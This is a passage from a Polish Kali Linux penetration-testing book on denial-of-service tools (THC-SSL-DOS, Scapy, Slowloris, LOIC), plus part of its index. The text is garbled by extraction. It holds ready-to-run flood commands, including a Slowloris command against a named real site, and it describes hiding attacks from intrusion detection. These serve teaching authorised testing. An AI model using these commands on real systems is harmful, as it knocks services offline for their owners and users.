Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca

thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept

W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej

Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

259

ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

